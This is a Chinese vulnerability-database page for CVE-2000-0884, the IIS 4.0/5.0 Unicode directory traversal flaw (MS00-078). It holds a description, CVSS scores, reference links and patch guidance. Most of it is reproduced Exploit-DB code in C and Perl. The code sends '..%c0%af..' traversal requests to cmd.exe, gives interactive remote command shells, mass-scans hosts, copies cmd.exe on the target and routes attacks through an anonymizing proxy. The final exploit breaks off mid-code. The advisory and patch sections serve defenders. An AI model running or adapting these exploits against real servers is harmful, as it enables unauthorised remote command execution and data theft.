CVE-2000-0884
CVSS7.5
发布时间 :2000-12-19 00:00:00
修订时间 :2008-09-10 15:06:04
NMCOE    

[原文]IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.


[CNNVD]Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)(CNNVD-200012-156)

        
        IIS是Microsoft出品的一个广泛应用的Internet Web服务器软件,随Windows NT和Windows 2000捆绑发售。默认情况下IIS的某些目录是允许通过提交HTTP请求执行可执行文件的。
        NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些Web根目录以外的文件和程序。
        对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows系统认为0xc10xhh可能是Unicode编码,因此它会首先将其解码,如果 0x00<= %hh < 0x40的话,采用的解码的格式与下面的格式类似:
        %c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
        %c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
        因此,利用这种编码,我们可以构造很多字符,例如:
        %c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
        %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
        攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
        Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,此问题同样存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c"。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:internet_information_server:4.0Microsoft IIS 4.0
cpe:/a:microsoft:internet_information_server:5.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:44IIS Web Server Folder Traversal
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0884
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-156
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
(VENDOR_ADVISORY)  MS  MS00-078
http://xforce.iss.net/static/5377.php
(UNKNOWN)  XF  iis-unicode-translation
http://www.securityfocus.com/bid/1806
(UNKNOWN)  BID  1806
http://www.osvdb.org/436
(UNKNOWN)  OSVDB  436

- 漏洞信息

Microsoft IIS 4.0/5.0 Unicode解码错误可远程执行命令漏洞(MS00-078)
高危 输入验证
2000-12-19 00:00:00 2005-10-12 00:00:00
远程※本地  
        
        IIS是Microsoft出品的一个广泛应用的Internet Web服务器软件,随Windows NT和Windows 2000捆绑发售。默认情况下IIS的某些目录是允许通过提交HTTP请求执行可执行文件的。
        NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些Web根目录以外的文件和程序。
        对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows系统认为0xc10xhh可能是Unicode编码,因此它会首先将其解码,如果 0x00<= %hh < 0x40的话,采用的解码的格式与下面的格式类似:
        %c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
        %c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
        因此,利用这种编码,我们可以构造很多字符,例如:
        %c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
        %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
        攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
        Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,此问题同样存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c"。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果不需要可执行的CGI,可以删除可执行虚拟目录,例如 /scripts等等。
        * 如果确实需要可执行的虚拟目录,建议可执行虚拟目录单独在一个分区。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS00-078)以及相应补丁:
        MS00-078:Patch Available for "Web Server Folder Traversal" Vulnerability
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

        补丁下载:
        Microsoft IIS 4.0:
        
        http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

        Microsoft IIS 5.0:
        
        http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

- 漏洞信息 (189)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (6) (EDBID:189)
windows remote
2000-11-18 Verified
80 incubus
N/A [点击下载]
/* iisex iis exploit  (<- nost's idea) v2
 * --------------------------------------
 * Okay.. the first piece of code was not really finished.
 * So, i apologize to everybody.. 
 *
 * by incubus <incubus@securax.org>
 *
 * grtz to: Bio, nos, zoa, reg and vor... (who else would stay up 
 * at night to exploit this?) to securax (#securax@efnet) - also 
 * to kim, glyc, s0ph, tessa, lamagra and steven.
 */ 
     
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
  char buffy[666]; /* well, what else? I dunno how long your commands are.. */
  char buf[500];
  char rcvbuf[8192];
  int i, sock, result;
  struct sockaddr_in 	name;
  struct hostent 	*hostinfo;
  if (argc < 2){
    printf ("try %s www.server.com\n", argv[0]);
    printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
    printf ("by incubus <incubus@securax.org>\n\n");
    exit(0);
  }
  printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n");
  printf ("act like a cmd.exe kiddie, type quit to quit.\n");
  for (;;)
  {
    printf ("\n[enter cmd> ");
    gets(buf);
    if (strstr(buf, "quit")) exit(0);
    i=0;
    while (buf[i] != '\n'){
      if(buf[i] == 32) buf[i] = 43;
      i++; 
    }
    hostinfo=gethostbyname(argv[1]);
    if (!hostinfo){
      herror("Oops"); exit(-1);
    }
    name.sin_family=AF_INET; name.sin_port=htons(80);
    name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
    sock=socket(AF_INET, SOCK_STREAM, 0);
    result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
    if (result != 0) { herror("Oops"); exit(-1); }
      if (sock < 0){
        herror("Oops"); exit(-1);
    }
    strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
    strcat(buffy,buf);
    strcat(buffy, " HTTP/1.0\n\n");
    send(sock, buffy, sizeof(buffy), 0);
    recv(sock, rcvbuf, sizeof(rcvbuf), 0);
    printf ("%s", rcvbuf);
    close(sock);
  }
}


// milw0rm.com [2000-11-18]
		

- 漏洞信息 (190)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (9) (EDBID:190)
windows remote
2000-11-18 Verified
80 optyx
N/A [点击下载]
/****************************************************************************\
**                                                                          **
**    Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit    **
**      proof of theory exploit cuz it's wednesday and i'm on the couch     **
**                                                                          **
**       brought to you by the letter B, the number 7, optyx, and t12       **
**          optyx - <optyx@uberhax0r.net optyx@newhackcity.net>             **
**          t12 - <t12@uberhax0r.net>                                       **
**                                                                          **
**     greetz go out to aempirei, a gun toatin' gangstah' hustler' player   **
**     motherfucker who isn't with us anymore, miah, who's GTA2 game was    **
**     was most entertaining tonight, Cathy, who provided the trippy light  **
**     to stare at, and to KT, for providing me with hours of decent        **
**     conversation.                                                        **
**                                                                          **
\****************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>

void usage(void) 
{
 fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>"); 
 fprintf(stderr, " [-p port] [-t timeout]\n"); 
 exit(-1);
}

int main(int argc, char **argv) 
{
 int i, j;
 int port=80;
 int timeout=3;
 int interactive=0;
 char temp[1];
 char host[512]=""; 
 char cmd[1024]="";
 char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
 struct hostent *he;
 struct sockaddr_in s_addr;

 printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\n");
 printf("by optyx and t12\n");

 for(i=0;i<argc;i++) 
	{ if(argv[i][0] == '-') {
		 for(j=1;j<strlen(argv[i]);j++) 
		 	{
			 switch(argv[i][j]) 
			 	{
				 case 't':
				 	strncpy(host, argv[i+1], sizeof(host));
				 	break;
				 case 'c':
				 	strncpy(cmd, argv[i+1], sizeof(cmd));
				 	break;
				 case 'h':
				 	usage();
			 	 	break;
				 case 'o':
					timeout=atoi(argv[i+1]); 
				 	break;
				 case 'p':
				 	port=atoi(argv[i+1]);
				 	break;
				 case 'i':
				 	interactive=1;
				 	break;
				 default:
				 break;
				}
			}
		}
	}

 if(!strcmp(host, "")) 
	{
	 fprintf(stderr, "specify target host\n");
	 usage();
	}

 if(!strcmp(cmd, "") && !interactive) 
	{
	 fprintf(stderr, "specify command to execute\n");
	 usage();
	}

 printf("]- Target - %s:%d\n", host, port);
 if(!interactive)
 	 printf("]- Command - %s\n", cmd);
 printf("]- Timeout - %d seconds\n", timeout);
 if((he=gethostbyname(host)) == NULL) 
	{
 	 fprintf(stderr, "invalid target\n");
	 usage();
	}

 do
 	{

	 if(interactive)
	 	 {
		  cmd[0]=0;
		  printf("\nC> ");
		  if(fgets(cmd, sizeof(cmd), stdin) == NULL)
		  	  fprintf(stderr, "gets() error\n"); 
		  cmd[strlen(cmd)-1]='\0';
		  if(!strcmp("exit", cmd))
		  	  exit(-1);
		 }

 	 for(i=0;i<strlen(cmd);i++) 
		 {
	 	  if(cmd[i]==' ')
		  	cmd[i]='+';
		 }

	 strncpy(request, 
		   "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
		   sizeof(request));
 	 strncat(request, cmd, sizeof(request) - strlen(request));	
 	 strncat(request, "\n", sizeof(request) - strlen(request));

 	 s_addr.sin_family = PF_INET;
 	 s_addr.sin_port = htons(port);
 	 memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, 
 		sizeof(s_addr.sin_addr));	

 	 if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
		 {
	 	  fprintf(stderr, "cannot create socket\n");
	 	  exit(-1);
		 }

 	 alarm(timeout);
 	 j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));
 	 alarm(0);

 	 if(j==-1) 
		 {
	 	  fprintf(stderr, "cannot connect to %s\n", host);
	 	  exit(-1);
	 	  close(i);
		 }

	 if(!interactive)
 	 	  printf("]- Sending request: %s\n", request);

 	 send(i, request, strlen(request), 0);

	 if(!interactive)
 	 	  printf("]- Getting results\n");

 	 while(recv(i,temp,1, 0)>0) 
		 {
         	  alarm(timeout);
	 	  printf("%c", temp[0]);
         	  alarm(0);
		 }	

  }
  while(interactive);

  close(i);	
  return 0;
}

http://www.exploit-db.com/sploits/190-1.exe

http://www.exploit-db.com/sploits/190-2.obsd

http://www.exploit-db.com/sploits/190-3.linux

// milw0rm.com [2000-11-18]		

- 漏洞信息 (191)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (7) (EDBID:191)
windows remote
2000-11-18 Verified
80 steeLe
N/A [点击下载]
#!/usr/bin/perl
#
# IIS 4.0/5.0 Unicode Exploit
# Checks for each script that has been posted on the BugTraq Lis
# Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others
# Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will
# log sites in the log_unicode.log.
# So Simple

# Use Socket
use Socket;

# incase no arguements or less arguements are given
if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n".
                                     "Programmed by SteeLe\n".
                                     "Usage: ./$0 <single host> <dir for exploit>\n"; }

# Variables
$blah = $ARGV[0];
$port = 80;
$dir = $ARGV[1];
$timeout = 4;

# see if file is there, 
if (-e "$blah") { 
  open(T, "$blah") || die "can't open $blah\n"; 
  @target = <T>;
  close(T);
}

else { @target[0] = $blah; } # what you think is blah

# all scripts mentioned on bugtraq, we know rfp knows more.
@scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..",
"..%c1%pc.."); # blah, i know i'm not l33t

# Open LOG Script
open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n";

# Socket Stuff
foreach $script (@scripts) {
  $submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r";
  $ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir";
  foreach $site (@target) {
    unless(fork()) {
      chop($site) if $site =~ /\n$/; &connect($site); 
    } # so i lied
  }
}

sub connect { # real socket stuff
  my ($ste) = @_;
  $iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n";
  $paddr = sockaddr_in($port, $iaddr);
  $proto = getprotobyname('tcp');
  local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) };
  alarm $timeout;
  socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste");
  connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n";
  send(SCAN, $submit, 0);
  $blackout = <SCAN>;
  ($http,$code,$blah) == split(/ /, $blackout);
  if ($code == "200") {
    print "$ste has $ouch on there, go exploit it\n"; 
    print LOG "$ste has $ouch on there\n";
  }
  else { print "$ste doesn't have it\n"; }
  close(SCAN);
  exit(0);
}
close(LOG);

# since we're done
exit;


# milw0rm.com [2000-11-18]
		

- 漏洞信息 (192)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (8) (EDBID:192)
windows remote
2000-11-18 Verified
80 Roelof Temmingh
N/A [点击下载]
#!/usr/bin/perl
#
# See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
#
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to security@nsfocus.com for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
# roelof@sensepost.com http://www.sensepost.com

use Socket;
# --------------init
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);

# --------------test if cmd has been copied:
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) { 
  print "Sensepost.exe not found - Copying CMD...\n";
  $command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
  $command=~s/ /\%20/g;
  @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
  foreach $line2 (@results2){
    if (($line2 =~ /copied/ )) {$failed2=0;}
  }
  if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
} 

# ------------ we can assume that the cmd.exe is copied from here..
$command=@ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
  my ($pstr)=@_;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
    die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
    my @in;
    select(S);      $|=1;   print $pstr;
    while(<S>){ push @in, $_;}
    select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata


# milw0rm.com [2000-11-18]
		

- 漏洞信息 (20298)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (1) (EDBID:20298)
windows remote
2000-10-17 Verified
0 Gabriel Maggiotti
N/A [点击下载]
source: http://www.securityfocus.com/bid/1806/info

Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". 

Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.

It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)

This is the vulnerability exploited by the Code Blue Worm.

**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define SEND	100000
#define RECIVE	1000000


char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[SEND]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd, numbytes;
char recv_buf[RECIVE];
int i;
int port;


char *uni[]={
        "..%c0%af..",
        "..%c0%af../..%c0%af../..%c0%af..",
        "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..",

        "..%c1%1c..",
        "..%c1%1c../..%c1%1c../..%c1%1c..",
        "..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..",

        "..%252f..",
        "..%252f../..%252f../..%252f..",
        "..%252f..%252f..%252f..%252f..%252f..",

        "..%252e..",
        ".%252e..",
        "..%252e../..%252e../..%252e..",
        "..%252e..%252e..%252e..%252e..%252e..",

        "..%c0%9v..",
        "..%c0%9v../..%c0%9v../..%c0%9v..",
        "..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..",

        "..%c0%qf..",
        "..%c0%qf../..%c0%qf../..%c0%qf..",
        "..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..",

	"..%c1%8s..",
        "..%c1%8s../..%c1%8s../..%c1%8s..",
        "..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..",

        "..%c1%9c..",
        "..%c1%9c../..%c1%9c../..%c1%9c..",
        "..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..",

        "..%c1%pc..",
        "..%c1%pc../..%c1%pc../..%c1%pc..",
        "..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..",

        "..%255c..",
        "..%255c../..%255c../..%255c..",
        "..%255c..%255c..%255c..%255c..%255c..",

        "..%5c..",
        "..%5c../..%5c../..%5c..",
        "..%5c..%5c..%5c..%5c..%5c..",

        "..%%35c..",
        "..%%35c../..%%35c../..%%35c..",
        "..%%35c../..%%35c../..%%35c",		//last news
        "..%%35c..%%35c..%%35c..%%35c..%%35c..",

        "..%%35%63..",
        "..%%35%63../..%%35%63../..%%35%63..",
        "..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..",

        "..%25%35%63..",
        "..%25%35%63../..%25%35%63../..%25%35%63..",
        "..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63.."
};


char *path[]={
        "/scripts/#uni/winnt/system32/cmd.exe?/c+",
        "/scripts/#uniwinnt/system32/cmd.exe?/c+",
        "/msadc/#uni/winnt/system32/cmd.exe?/c+",
        "/cgi-bin/#uni/winnt/system32/cmd.exe?/c+",
        "/samples/#uni/winnt/system32/cmd.exe?/c+",
        "/iisadmpwd/#uni/winnt/system32/cmd.exe?/c+",
        "/_vti_cnf/#uni/winnt/system32/cmd.exe?/c+",
        "/_vti_bin/#uni/winnt/system32/cmd.exe?/c+",
        "/exchange/#uni/winnt/system32/cmd.exe?/c+",
        "/pbserver/#uni/winnt/system32/cmd.exe?/c+",
        "/adsamples/#uni/winnt/system32/cmd.exe?/c+"
};

int cont=0;

char send_buf[SEND]="";
int x,j;
int uni_len=sizeof(uni)/sizeof(char *);
int path_len=sizeof(path)/sizeof(char *);


struct hostent *he;

struct sockaddr_in their_addr;


if(argc!=4)
{
	fprintf(stderr,"usage:%s <hostname> <port> <commands>\n",argv[0]);
	exit(1);
}


if((he=gethostbyname(argv[1]))==NULL)
{
	perror("gethostbyname");
	exit(1);
}

port=atoi(argv[2]);


/***************************************************************************/

for(x=0;x<path_len;x++)
for(j=0;j<uni_len;j++)
{
sprintf(send_buf,"GET %s%s  HTTP/ 1.0\n\n", path[i],argv[3] );
str_replace(uni[j],"#uni",send_buf);

	if(cont==200) {
		sleep(3);
		cont=0;
	}
cont++;
sleep(1);
if( fork()!=0)
{

	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
	{
		perror("socket");
		exit(1);
	}


	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(port);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);



	if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
	{
		perror("connect");
		exit(1);
	}

	if(send(sockfd,send_buf,SEND,0) ==-1)
	{
		perror("send");
		exit(0);
	}

	if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
	{
                perror("recv");
                exit(1);
	}
        recv_buf[numbytes]='\0';
        //printf("%s\n",recv_buf);

	if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
	{
                perror("recv");
                exit(1);
	}
        recv_buf[numbytes]='\0';
        printf("\n-----------------------------------------------\n");
        printf("String: %s\n\n",send_buf);
        printf("%s\n------------bytes recived: %d------------------\n",recv_buf,numbytes);




	close(sockfd);
	exit(0);
}

close(sockfd);
while(waitpid(-1,NULL, WNOHANG) > 0);
}


printf("Done...\n");
return 0;
}		

- 漏洞信息 (20299)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (2) (EDBID:20299)
windows remote
2000-10-21 Verified
0 Roelof Temmingh
N/A [点击下载]
source: http://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

#!/usr/bin/perl
# Very simple PERL script to test a machine for Unicode vulnerability. 
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodecheck IP:port
# Only makes use of "Socket" library
# Roelof Temmingh 2000/10/21
# roelof@sensepost.com http://www.sensepost.com

use Socket;
# --------------init
if ($#ARGV<0) {die "Usage: unicodecheck IP:port\n";}
($host,$port)=split(/:/,@ARGV[0]);
print "Testing $host:$port : ";
$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 2
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n");
foreach $line (@results){
 if ($line =~ /Directory/) {$flag=1;}}
# ---------------result
if ($flag==1){print "Vulnerable\n";}
else {print "Safe\n";}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata


		

- 漏洞信息 (20300)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3) (EDBID:20300)
windows remote
2000-10-17 Verified
0 zipo
N/A [点击下载]
source: http://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

/* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */
/* coded by zipo */
/* to compile: cc -o iisuni iisuni.c */
/* made for all the lame populus :) */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFF_LEN 6000
#define HTTP " HTTP/1.0\r\n\r\n"
#define GET "GET http://"
/* this is the anonymous server used */
#define ANON "anon.free.anonymizer.com"
/* this are all the types of bugs */
#define BUG1_STR
"/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR
"/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG4_STR "/"
/* this is the IIS http server port */
#define HTTP_PORT 80
int main (int argc, char *argv[]) {
   struct sockaddr_in sin;
   struct hostent *he;
   char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN];
   int sck, i;
   if (argc < 3)
     bad_params (argv[0]);
   switch (atoi(argv[2])) {
    case 1:
      bug = BUG1_STR;
      break;
    case 2:
      bug = BUG2_STR;
      break;
    case 3:
      bug = BUG3_STR;
      break;
    case 4:
      bug = BUG4_STR;
      break;
    default:
      printf ("Number error\n");
      exit(1);
   }
   while (1) {
      printf ("bash# ");
      fgets (cmd, sizeof(cmd), stdin);
      cmd[strlen(cmd)-1] = '\0';
      if (strcmp(cmd, "exit")) {
      	 if (!strcmp(cmd, "clear")) {
	    system("clear");
	    continue;
	 } else if (!strcmp(cmd, "")) {
	    continue;
	 } else if (!strcmp(cmd, "?")) {
	    printf ("Just you need to type in the prompt the M$DOS
command\n");
	    printf ("to exit type \"exit\" :)\n");
	    continue;
	 }
	 /* prepare the string to be sent */
	 for (i=0;i<=strlen(cmd);i++) {
	    if (cmd[i] == 0x20)
	      cmd[i] = 0x2b;
	 }
	 sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP);
	 /* get ip */
	 if ((he = gethostbyname (ANON)) == NULL) {
	    herror ("host error");
	    exit (1);
	 }
	 /* setup port and other parameters */
	 sin.sin_port = htons (HTTP_PORT);
	 sin.sin_family = AF_INET;
	 memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
	 /* create a socket */
	 if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) {
	    perror ("socket() error");
	    exit (1);
	 }
	 /* connect to the sucker */
	 if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) {
	    perror ("connect() error");
	    exit (1);
	 }
	 /* send the beautifull string */
	 write (sck, buffer, sizeof(buffer));
	 /* recive all ! :) */
	 read (sck, recbuffer, sizeof(recbuffer));
	 /* and print it */
	 recbuffer[strlen(recbuffer)-1]='\0';
	 printf
("\033[0;7m-------------------------------------Received--------------------
---------------\n");
	 printf
("%s\n---------------------------------------Done---------------------------
----------\n\033[7;0m", recbuffer);
